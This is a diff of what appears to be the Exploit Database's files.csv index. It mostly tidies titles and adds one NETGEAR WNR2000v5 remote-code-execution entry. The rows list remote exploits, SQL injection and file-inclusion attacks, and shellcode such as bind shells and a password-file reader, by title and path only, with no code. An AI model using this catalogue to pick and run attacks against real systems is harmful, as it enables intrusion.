 40275,platforms/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Exploit",2016-08-19,"Shadow Brokers",hardware,remote,0
 40294,platforms/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,php,remote,80
-40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
+40436,platforms/android/remote/40436.rb,"Google Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
 40445,platforms/windows/remote/40445.txt,"DWebPro 8.4.2 - Multiple Vulnerabilities",2016-10-03,Tulpa,windows,remote,0
 40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
 40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - 'Login' Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
@@ -15179,6 +15181,7 @@ id,file,description,date,author,platform,type,port
 40916,platforms/linux/remote/40916.txt,"APT - Repository Signing Bypass via Memory Allocation Failure",2016-12-14,"Google Security Research",linux,remote,0
 40920,platforms/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",linux,remote,0
 40930,platforms/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,osx,remote,0
+40949,platforms/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",cgi,remote,80
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -15219,8 +15222,8 @@ id,file,description,date,author,platform,type,port
 13279,platforms/freebsd_x86-64/shellcode/13279.c,"FreeBSD/x86-64 - exec(_/bin/sh_) Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",freebsd_x86-64,shellcode,0
 13280,platforms/freebsd_x86-64/shellcode/13280.c,"FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,freebsd_x86-64,shellcode,0
 13281,platforms/generator/shellcode/13281.c,"Linux/x86 - execve Null Free Shellcode (Generator)",2009-06-29,certaindeath,generator,shellcode,0
-13282,platforms/generator/shellcode/13282.php,"Linux/x86 - portbind payload Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0
-13283,platforms/generator/shellcode/13283.php,"Windows XP SP1 - portbind payload Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0
+13282,platforms/generator/shellcode/13282.php,"Linux/x86 - Portbind Payload Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0
+13283,platforms/generator/shellcode/13283.php,"Windows XP SP1 - Portbind Payload Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0
 13284,platforms/generator/shellcode/13284.txt,"(Generator) - /bin/sh Polymorphic Shellcode with printable ASCII characters",2008-08-31,sorrow,generator,shellcode,0
 13285,platforms/generator/shellcode/13285.c,"Linux/x86 - cmd Null Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0
 13286,platforms/generator/shellcode/13286.c,"(Generator) - Alphanumeric Shellcode Encoder/Decoder",2008-08-04,"Avri Schneider",generator,shellcode,0
@@ -15707,7 +15710,7 @@ id,file,description,date,author,platform,type,port
 38116,platforms/lin_x86/shellcode/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",lin_x86,shellcode,0
 38126,platforms/osx/shellcode/38126.c,"OSX/x86-64 - 4444/TPC port bind Nullfree Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0
 38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux/x86-64 - /bin/sh Shellcode",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0
-38194,platforms/android/shellcode/38194.c,"Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0
+38194,platforms/android/shellcode/38194.c,"Google Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0
 38239,platforms/lin_x86-64/shellcode/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,lin_x86-64,shellcode,0
 38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bindshell 31173 port with Password Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0
 38708,platforms/lin_x86-64/shellcode/38708.asm,"Linux/x86-64 - egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,lin_x86-64,shellcode,0
@@ -15987,7 +15990,7 @@ id,file,description,date,author,platform,type,port
 1363,platforms/php/webapps/1363.php,"Website Baker 2.6.0 - Login Bypass / Remote Code Execution",2005-12-08,rgod,php,webapps,0
 1364,platforms/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,php,webapps,0
 1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Exploit",2005-12-10,rgod,php,webapps,0
-1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 - (phpcoinsessid) SQL Inj / Remote Code Execution",2005-12-12,rgod,php,webapps,0
+1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution",2005-12-12,rgod,php,webapps,0
 1373,platforms/php/webapps/1373.php,"Limbo 1.0.4.2 - _SERVER[REMOTE_ADDR] Overwrite Remote Exploit",2005-12-14,rgod,php,webapps,0
 1379,platforms/php/webapps/1379.php,"PHPGedView 3.3.7 - Arbitrary Remote Code Execution",2005-12-20,rgod,php,webapps,0
 1382,platforms/php/webapps/1382.pl,"phpBB 2.0.18 - Remote Brute Force/Dictionary Attack Tool (2)",2006-02-20,DarkFig,php,webapps,0
@@ -16055,7 +16058,7 @@ id,file,description,date,author,platform,type,port
 1543,platforms/php/webapps/1543.pl,"vuBB 0.2 - 'cookie' Final SQL Injection (mq=off)",2006-03-01,KingOfSka,php,webapps,0
 1544,platforms/php/webapps/1544.pl,"Woltlab Burning Board 2.x - Datenbank MOD (fileid) SQL Injection",2006-03-01,nukedx,php,webapps,0
 1546,platforms/php/webapps/1546.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (2)",2006-03-02,cijfer,php,webapps,0
-1547,platforms/php/webapps/1547.txt,"Aztek Forum 4.00 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities (PoC)",2006-03-02,lorenzo,php,webapps,0
+1547,platforms/php/webapps/1547.txt,"Aztek Forum 4.00 - Cross-Site Scripting / SQL Injection",2006-03-02,lorenzo,php,webapps,0
 1548,platforms/php/webapps/1548.pl,"MyBulletinBoard (MyBB) 1.04 - 'misc.php' SQL Injection (2)",2006-03-03,Devil-00,php,webapps,0
 1549,platforms/php/webapps/1549.php,"PHP-Stats 0.1.9.1 - Remote Commands Execution Exploit",2006-03-04,rgod,php,webapps,0
 1550,platforms/asp/webapps/1550.txt,"TotalECommerce 1.0 - (index.asp id) SQL Injection",2006-03-04,nukedx,asp,webapps,0
@@ -16503,13 +16506,13 @@ id,file,description,date,author,platform,type,port
 2247,platforms/php/webapps/2247.php,"MercuryBoard 1.1.4 - 'User-Agent' SQL Injection",2006-08-23,rgod,php,webapps,0
 2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod 1.5.0 - (start) SQL Injection",2006-08-23,SpiderZ,php,webapps,0
 2249,platforms/php/webapps/2249.txt,"pSlash 0.7 - (lvc_include_dir) Remote File Inclusion",2006-08-23,"Mehmet Ince",php,webapps,0
-2250,platforms/php/webapps/2250.pl,"Integramod Portal 2.x - (functions_portal.php) Remote File Inclusion",2006-08-23,nukedx,php,webapps,0
+2250,platforms/php/webapps/2250.pl,"Integramod Portal 2.x - 'functions_portal.php' Remote File Inclusion",2006-08-23,nukedx,php,webapps,0
 2251,platforms/php/webapps/2251.pl,"VistaBB 2.x - (functions_mod_user.php) Remote File Inclusion",2006-08-23,nukedx,php,webapps,0
 2252,platforms/php/webapps/2252.pl,"Wikepage Opus 10 <= 2006.2a (lng) - Remote Command Execution",2006-08-24,Hessam-x,php,webapps,0
 2253,platforms/php/webapps/2253.php,"Phaos 0.9.2 - basename() Remote Command Execution",2006-08-24,Kacper,php,webapps,0
 2254,platforms/php/webapps/2254.txt,"PHPCOIN 1.2.3 - (session_set.php) Remote File Inclusion",2006-08-24,Timq,php,webapps,0
 2255,platforms/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass",2006-08-25,Vipsta,php,webapps,0
-2256,platforms/php/webapps/2256.txt,"Integramod Portal 2.0 rc2 - 'phpbb_root_path' Remote File Inclusion",2006-08-25,MATASANOS,php,webapps,0
+2256,platforms/php/webapps/2256.txt,"Integramod Portal 2.0 rc2 - 'phpbb_root_path' Parameter Remote File Inclusion",2006-08-25,MATASANOS,php,webapps,0
 2257,platforms/php/webapps/2257.txt,"CliServ Web Community 0.65 - (cl_headers) Include",2006-08-25,Kacper,php,webapps,0
 2259,platforms/php/webapps/2259.txt,"ProManager 0.73 - 'note.php' SQL Injection",2006-08-26,Kacper,php,webapps,0
 2260,platforms/php/webapps/2260.pl,"AlberT-EasySite 1.0a5 - 'PSA_PATH' Parameter Remote File Inclusion",2006-08-27,Kacper,php,webapps,0
@@ -16658,7 +16661,7 @@ id,file,description,date,author,platform,type,port
 2434,platforms/php/webapps/2434.txt,"faceStones personal 2.0.42 - (fs_form_links.php) File Inclusion",2006-09-25,SHiKaA,php,webapps,0
 2435,platforms/php/webapps/2435.txt,"Web//News 1.4 - 'parser.php' Remote File Inclusion (1)",2006-09-26,ThE-WoLf-KsA,php,webapps,0
 2436,platforms/php/webapps/2436.txt,"A-Blog 2.0 - 'menu.php' Remote File Inclusion",2006-09-26,Drago84,php,webapps,0
-2437,platforms/php/webapps/2437.php,"paBugs 2.0 Beta 3 - (class.mysql.php) Remote File Inclusion",2006-09-26,Kacper,php,webapps,0
+2437,platforms/php/webapps/2437.php,"paBugs 2.0 Beta 3 - 'class.mysql.php' Remote File Inclusion",2006-09-26,Kacper,php,webapps,0
 2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 - (hit.php) Remote File Inclusion",2006-09-26,D_7J,php,webapps,0
 2439,platforms/php/webapps/2439.txt,"Newswriter SW 1.42 - (editfunc.inc.php) File Inclusion",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0
 2441,platforms/php/webapps/2441.pl,"Blog Pixel Motion 2.1.1 - PHP Code Execution / Create Admin Exploit",2006-09-27,DarkFig,php,webapps,0
@@ -16887,7 +16890,7 @@ id,file,description,date,author,platform,type,port
 2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum - 'message_details.php' SQL Injection",2006-11-05,Bl0od3r,php,webapps,0
 2724,platforms/php/webapps/2724.txt,"Soholaunch Pro 4.9 r36 - Remote File Inclusion",2006-11-06,the_day,php,webapps,0
 2725,platforms/php/webapps/2725.txt,"Cyberfolio 2.0 RC1 - 'av' Parameter Remote File Inclusion",2006-11-06,the_day,php,webapps,0
-2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 - (MysqlfinderAdmin.php) Remote File Inclusion",2006-11-06,the_day,php,webapps,0
+2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 - 'MysqlfinderAdmin.php' Remote File Inclusion",2006-11-06,the_day,php,webapps,0
 2727,platforms/php/webapps/2727.txt,"OpenEMR 2.8.1 - (srcdir) Multiple Remote File Inclusion",2006-11-06,the_day,php,webapps,0
 2728,platforms/php/webapps/2728.txt,"Article Script 1.6.3 - 'rss.php' SQL Injection (1)",2006-11-06,Liz0ziM,php,webapps,0
 2731,platforms/php/webapps/2731.pl,"iPrimal Forums - 'admin/index.php' Change User Password Exploit",2006-11-06,Bl0od3r,php,webapps,0
@@ -16931,9 +16934,9 @@ id,file,description,date,author,platform,type,port
 2778,platforms/php/webapps/2778.txt,"PHPPeanuts 1.3 Beta - (Inspect.php) Remote File Inclusion",2006-11-14,"Hidayat Sagita",php,webapps,0
 2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 - 'default.asp' Login Bypass (SQL Injection)",2006-11-14,ajann,asp,webapps,0
 2780,platforms/asp/webapps/2780.txt,"NetVIOS 2.0 - (page.asp) SQL Injection",2006-11-14,ajann,asp,webapps,0
-2781,platforms/asp/webapps/2781.txt,"blogme 3.0 - (Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities",2006-11-14,"Security Access Point",asp,webapps,0
+2781,platforms/asp/webapps/2781.txt,"blogme 3.0 - Cross-Site Scripting / Authentication Bypass",2006-11-14,"Security Access Point",asp,webapps,0
 2782,platforms/asp/webapps/2782.txt,"Hpecs Shopping Cart - Remote Login Bypass",2006-11-14,"Security Access Point",asp,webapps,0
-2786,platforms/php/webapps/2786.txt,"torrentflux 2.2 - (Arbitrary File Create/ Execute / Delete) Multiple Vulnerabilities",2006-11-15,r0ut3r,php,webapps,0
+2786,platforms/php/webapps/2786.txt,"torrentflux 2.2 - Arbitrary File Create/ Execute/Delete",2006-11-15,r0ut3r,php,webapps,0
 2790,platforms/php/webapps/2790.pl,"Etomite CMS 0.6.1.2 - (manager/index.php) Local File Inclusion",2006-11-16,Revenge,php,webapps,0
 2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool - 'download.php' Information Disclosure",2006-11-16,"Craig Heffner",php,webapps,0
 2794,platforms/php/webapps/2794.txt,"mg.applanix 1.3.1 - (apx_root_path) Remote File Inclusion",2006-11-17,v1per-haCker,php,webapps,0
@@ -16992,7 +16995,7 @@ id,file,description,date,author,platform,type,port
 2877,platforms/php/webapps/2877.txt,"Invision Community Blog Mod 1.2.4 - SQL Injection",2006-12-01,anonymous,php,webapps,0
 2878,platforms/php/webapps/2878.txt,"ContentServ 4.x - (admin/FileServer.php) File Disclosure",2006-12-01,qobaiashi,php,webapps,0
 2881,platforms/asp/webapps/2881.txt,"Ultimate HelpDesk - Cross-Site Scripting / Local File Disclosure",2006-12-01,ajann,asp,webapps,0
-2882,platforms/php/webapps/2882.txt,"BBS E-Market Professional - (Full Path Disclosure / File Inclusion) Multiple Vulnerabilities",2006-12-02,y3dips,php,webapps,0
+2882,platforms/php/webapps/2882.txt,"BBS E-Market Professional - Full Path Disclosure / File Inclusion",2006-12-02,y3dips,php,webapps,0
 2883,platforms/php/webapps/2883.txt,"simple file manager 0.24a - Multiple Vulnerabilities",2006-12-02,flame,php,webapps,0
 2884,platforms/php/webapps/2884.txt,"awrate.com Message Board 1.0 - 'search.php' Remote File Inclusion",2006-12-02,DeltahackingTEAM,php,webapps,0
 2885,platforms/php/webapps/2885.txt,"mxBB Module mx_tinies 1.3.0 - Remote File Inclusion",2006-12-02,bd0rk,php,webapps,0
@@ -17083,7 +17086,7 @@ id,file,description,date,author,platform,type,port
 3007,platforms/php/webapps/3007.txt,"Irokez Blog 0.7.1 - Multiple Remote File Inclusion",2006-12-25,nuffsaid,php,webapps,0
 3008,platforms/php/webapps/3008.pl,"Ciberia Content Federator 1.0.1 - (path) Remote File Inclusion",2006-12-25,DeltahackingTEAM,php,webapps,0
 3009,platforms/php/webapps/3009.txt,"Shadowed Portal Module Character Roster - (mod_root) Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0
-3010,platforms/php/webapps/3010.txt,"myPHPNuke Module My_eGallery 2.5.6 - 'basepath' Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0
+3010,platforms/php/webapps/3010.txt,"myPHPNuke Module My_eGallery 2.5.6 - 'basepath' Parameter Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0
 3011,platforms/php/webapps/3011.pl,"Fishyshoop 0.930b - Remote Add Administrator Account Exploit",2006-12-25,"James Gray",php,webapps,0
 3012,platforms/php/webapps/3012.txt,"Okul Merkezi Portal 1.0 - (ataturk.php) Remote File Inclusion",2006-12-25,ShaFuck31,php,webapps,0
 3014,platforms/php/webapps/3014.txt,"logahead UNU edition 1.0 - Arbitrary File Upload / Code Execution",2006-12-25,CorryL,php,webapps,0
@@ -17130,9 +17133,9 @@ id,file,description,date,author,platform,type,port
 3079,platforms/php/webapps/3079.txt,"Aratix 0.2.2b11 - (inc/init.inc.php) Remote File Inclusion",2007-01-04,nuffsaid,php,webapps,0
 3081,platforms/asp/webapps/3081.pl,"DigiRez 3.4 - (book_id) SQL Injection",2007-01-04,ajann,asp,webapps,0
 3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - (user.php id Variable) SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0
-3083,platforms/php/webapps/3083.txt,"ig shop 1.0 - (Code Execution / SQL Injection) Multiple Vulnerabilities",2007-01-05,"Michael Brooks",php,webapps,0
+3083,platforms/php/webapps/3083.txt,"ig shop 1.0 - Code Execution / SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0
 3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL Injection",2007-01-05,DarkFig,php,webapps,0
-3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 - (ordernum) Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0
+3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 - 'ordernum' Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0
 3090,platforms/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Inclusion",2007-01-06,"Mehmet Ince",php,webapps,0
 3091,platforms/php/webapps/3091.php,"L2J Statistik Script 0.09 - 'index.php' Local File Inclusion",2007-01-07,Codebreak,php,webapps,0
 3093,platforms/php/webapps/3093.txt,"AllMyGuests 0.3.0 - 'AMG_serverpath' Parameter Remote File Inclusion",2007-01-07,beks,php,webapps,0
@@ -17148,7 +17151,7 @@ id,file,description,date,author,platform,type,port
 3109,platforms/php/webapps/3109.php,"WordPress 2.0.6 - 'wp-trackback.php' SQL Injection",2007-01-10,rgod,php,webapps,0
 3113,platforms/php/webapps/3113.txt,"Jshop Server 1.3 - 'fieldValidation.php' Remote File Inclusion",2007-01-10,irvian,php,webapps,0
 3114,platforms/php/webapps/3114.txt,"Article System 0.1 - (INCLUDE_DIR) Remote File Inclusion",2007-01-11,3l3ctric-Cracker,php,webapps,0
-3115,platforms/asp/webapps/3115.txt,"vp-asp shopping cart 6.09 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2007-01-11,ajann,asp,webapps,0
+3115,platforms/asp/webapps/3115.txt,"vp-asp shopping cart 6.09 - SQL Injection / Cross-Site Scripting",2007-01-11,ajann,asp,webapps,0
 3116,platforms/php/webapps/3116.php,"sNews 1.5.30 - Remote Reset Admin Pass / Command Execution",2007-01-12,rgod,php,webapps,0
 3117,platforms/php/webapps/3117.txt,"LunarPoll 1.0 - (show.php PollDir) Remote File Inclusion",2007-01-12,"ilker Kandemir",php,webapps,0
 3118,platforms/php/webapps/3118.txt,"TLM CMS 1.1 - (i-accueil.php chemin) Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0
@@ -17190,7 +17193,7 @@ id,file,description,date,author,platform,type,port
 3194,platforms/asp/webapps/3194.txt,"makit Newsposter Script 3.0 - SQL Injection",2007-01-25,ajann,asp,webapps,0
 3195,platforms/asp/webapps/3195.txt,"GPS CMS 1.2 - (print.asp) SQL Injection",2007-01-25,ajann,asp,webapps,0
 3196,platforms/php/webapps/3196.php,"Aztek Forum 4.0 - Multiple Vulnerabilities",2007-01-25,DarkFig,php,webapps,0
-3197,platforms/asp/webapps/3197.txt,"forum livre 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2007-01-25,ajann,asp,webapps,0
+3197,platforms/asp/webapps/3197.txt,"forum livre 1.0 - SQL Injection / Cross-Site Scripting",2007-01-25,ajann,asp,webapps,0
 3198,platforms/php/webapps/3198.txt,"Virtual Path 1.0 - (vp/configure.php) Remote File Inclusion",2007-01-25,GoLd_M,php,webapps,0
 3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 - (package.php) Remote File Inclusion",2007-01-26,"Cold Zero",php,webapps,0
 3202,platforms/php/webapps/3202.txt,"AINS 0.02b - (ains_main.php ains_path) Remote File Inclusion",2007-01-26,"ThE dE@Th",php,webapps,0
@@ -17250,7 +17253,7 @@ id,file,description,date,author,platform,type,port
 3280,platforms/php/webapps/3280.txt,"AgerMenu 0.01 - (top.inc.php rootdir) Remote File Inclusion",2007-02-07,GoLd_M,php,webapps,0
 3281,platforms/php/webapps/3281.txt,"WebMatic 2.6 - (index_album.php) Remote File Inclusion",2007-02-07,MadNet,php,webapps,0
 3282,platforms/php/webapps/3282.pl,"Advanced Poll 2.0.5-dev - Remote Admin Session Generator Exploit",2007-02-07,diwou,php,webapps,0
-3283,platforms/php/webapps/3283.txt,"otscms 2.1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2007-02-07,GregStar,php,webapps,0
+3283,platforms/php/webapps/3283.txt,"otscms 2.1.5 - SQL Injection / Cross-Site Scripting",2007-02-07,GregStar,php,webapps,0
 3284,platforms/php/webapps/3284.txt,"Maian Recipe 1.0 - 'path_to_folder' Parameter Remote File Inclusion",2007-02-07,Denven,php,webapps,0
 3285,platforms/php/webapps/3285.htm,"Site-Assistant 0990 - (paths[version]) Remote File Inclusion",2007-02-08,ajann,php,webapps,0
 3286,platforms/php/webapps/3286.asp,"LightRO CMS 1.0 - (index.php projectid) SQL Injection",2007-02-08,ajann,php,webapps,0
@@ -17292,7 +17295,7 @@ id,file,description,date,author,platform,type,port
 3346,platforms/php/webapps/3346.pl,"PHP-Nuke 8.0 Final - (HTTP Referers) SQL Injection",2007-02-20,krasza,php,webapps,0
 3348,platforms/php/webapps/3348.txt,"SendStudio 2004.14 - (ROOTDIR) Remote File Inclusion",2007-02-20,K-159,php,webapps,0
 3351,platforms/php/webapps/3351.pl,"webSPELL 4.01.02 - (topic) SQL Injection",2007-02-21,DNX,php,webapps,0
-3352,platforms/php/webapps/3352.php,"Connectix Boards 0.7 - (p_skin) Multiple Vulnerabilities",2007-02-21,DarkFig,php,webapps,0
+3352,platforms/php/webapps/3352.php,"Connectix Boards 0.7 - 'p_skin' Multiple Vulnerabilities",2007-02-21,DarkFig,php,webapps,0
 3353,platforms/php/webapps/3353.txt,"DBImageGallery 1.2.2 - (donsimg_base_path) Remote File Inclusion",2007-02-21,Denven,php,webapps,0
 3354,platforms/php/webapps/3354.txt,"DBGuestbook 1.1 - (dbs_base_path) Remote File Inclusion",2007-02-21,Denven,php,webapps,0
 3355,platforms/php/webapps/3355.php,"Nabopoll 1.2 - (result.php surv) Blind SQL Injection",2007-02-21,s0cratex,php,webapps,0
@@ -17360,7 +17363,7 @@ id,file,description,date,author,platform,type,port
 3486,platforms/php/webapps/3486.txt,"Groupit 2.00b5 - (c_basepath) Remote File Inclusion",2007-03-15,the_day,php,webapps,0
 3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 - 'functions_dir' Parameter Remote File Inclusion",2007-03-15,Crackers_Child,php,webapps,0
 3489,platforms/php/webapps/3489.txt,"creative Guestbook 1.0 - Multiple Vulnerabilities",2007-03-15,Dj7xpl,php,webapps,0
-3490,platforms/php/webapps/3490.txt,"wbblog - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2007-03-15,"Mehmet Ince",php,webapps,0
+3490,platforms/php/webapps/3490.txt,"wbblog - Cross-Site Scripting / SQL Injection",2007-03-15,"Mehmet Ince",php,webapps,0
 3492,platforms/php/webapps/3492.txt,"WebCalendar 0.9.45 - (includedir) Remote File Inclusion",2007-03-15,Drackanz,php,webapps,0
 3493,platforms/asp/webapps/3493.txt,"Absolute Image Gallery 2.0 - (gallery.asp categoryId) SQL Injection",2007-03-15,WiLdBoY,asp,webapps,0
 3494,platforms/php/webapps/3494.txt,"McGallery 0.5b - 'download.php' Arbitrary File Download",2007-03-15,Piker,php,webapps,0
@@ -17424,7 +17427,7 @@ id,file,description,date,author,platform,type,port
 3583,platforms/php/webapps/3583.txt,"C-Arbre 0.6PR7 - 'ROOT_PATH' Remote File Inclusion",2007-03-26,K-159,php,webapps,0
 3588,platforms/php/webapps/3588.pl,"XOOPS module Articles 1.02 - (print.php id) SQL Injection",2007-03-27,WiLdBoY,php,webapps,0
 3590,platforms/php/webapps/3590.htm,"Joomla! Component D4JeZine 2.8 - Blind SQL Injection",2007-03-27,ajann,php,webapps,0
-3591,platforms/php/webapps/3591.txt,"PHP-Nuke Module Eve-Nuke 0.1 - (mysql.php) Remote File Inclusion",2007-03-27,"ThE TiGeR",php,webapps,0
+3591,platforms/php/webapps/3591.txt,"PHP-Nuke Module Eve-Nuke 0.1 - 'mysql.php' Remote File Inclusion",2007-03-27,"ThE TiGeR",php,webapps,0
 3592,platforms/php/webapps/3592.htm,"Web Content System 2.7.1 - Remote File Inclusion",2007-03-27,kezzap66345,php,webapps,0
 3594,platforms/php/webapps/3594.pl,"XOOPS module Articles 1.03 - (index.php cat_id) SQL Injection",2007-03-28,ajann,php,webapps,0
 3596,platforms/php/webapps/3596.txt,"iPhotoAlbum 1.1 - 'header.php' Remote File Inclusion",2007-03-28,GoLd_M,php,webapps,0
@@ -17516,7 +17519,7 @@ id,file,description,date,author,platform,type,port
 3722,platforms/php/webapps/3722.txt,"Expow 0.8 - (autoindex.php cfg_file) Remote File Inclusion",2007-04-12,mdx,php,webapps,0
 3723,platforms/php/webapps/3723.txt,"Request It 1.0b - (index.php id) Remote File Inclusion",2007-04-12,hackberry,php,webapps,0
 3725,platforms/php/webapps/3725.php,"Chatness 2.5.3 - (options.php/save.php) Remote Code Execution",2007-04-12,Gammarays,php,webapps,0
-3729,platforms/php/webapps/3729.txt,"Quick and Dirty Blog (qdblog) 0.4 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2007-04-13,Omni,php,webapps,0
+3729,platforms/php/webapps/3729.txt,"Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion",2007-04-13,Omni,php,webapps,0
 3731,platforms/php/webapps/3731.php,"Frogss CMS 0.7 - SQL Injection",2007-04-13,Kacper,php,webapps,0
 3732,platforms/php/webapps/3732.txt,"Garennes 0.6.1 - (repertoire_config) Remote File Inclusion",2007-04-13,GoLd_M,php,webapps,0
 3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x - (class.Smarty.php) Remote File Inclusion",2007-04-14,irvian,php,webapps,0
@@ -17585,7 +17588,7 @@ id,file,description,date,author,platform,type,port
 3835,platforms/php/webapps/3835.txt,"PostNuke Module v4bJournal - SQL Injection",2007-05-02,"Ali Abbasi",php,webapps,0
 3837,platforms/php/webapps/3837.txt,"phpChess Community Edition 2.0 - Multiple Remote File Inclusion",2007-05-03,GoLd_M,php,webapps,0
 3838,platforms/php/webapps/3838.txt,"Open Translation Engine (OTE) 0.7.8 - (header.php ote_home) Remote File Inclusion",2007-05-03,GoLd_M,php,webapps,0
-3839,platforms/php/webapps/3839.txt,"PHP Coupon Script 3.0 - (index.php bus) SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0
+3839,platforms/php/webapps/3839.txt,"PHP Coupon Script 3.0 - 'bus' Parameter SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0
 3840,platforms/php/webapps/3840.txt,"Pre Classifieds Listings 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0
 3841,platforms/php/webapps/3841.txt,"Pre News Manager 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0
 3842,platforms/php/webapps/3842.txt,"Pre Shopping Mall 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0
@@ -17646,7 +17649,7 @@ id,file,description,date,author,platform,type,port
 3932,platforms/php/webapps/3932.pl,"XOOPS Module Glossarie 1.7 - 'sid' SQL Injection",2007-05-15,ajann,php,webapps,0
 3933,platforms/php/webapps/3933.pl,"XOOPS Module MyConference 1.0 - 'index.php' SQL Injection",2007-05-15,ajann,php,webapps,0
 3935,platforms/php/webapps/3935.txt,"Glossword 1.8.1 - custom_vars.php Remote File Inclusion",2007-05-16,BeyazKurt,php,webapps,0
-3936,platforms/asp/webapps/3936.txt,"runawaysoft haber portal 1.0 - (tr) Multiple Vulnerabilities",2007-05-16,kerem125,asp,webapps,0
+3936,platforms/asp/webapps/3936.txt,"runawaysoft haber portal 1.0 - 'tr' Multiple Vulnerabilities",2007-05-16,kerem125,asp,webapps,0
 3941,platforms/php/webapps/3941.txt,"PHPGlossar 0.8 - (format_menue) Remote File Inclusion",2007-05-16,kezzap66345,php,webapps,0
 3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - 'newnr' Parameter SQL Injection",2007-05-16,Silentz,php,webapps,0
 3943,platforms/php/webapps/3943.pl,"FAQEngine 4.16.03 - (question.php questionref) SQL Injection",2007-05-16,Silentz,php,webapps,0
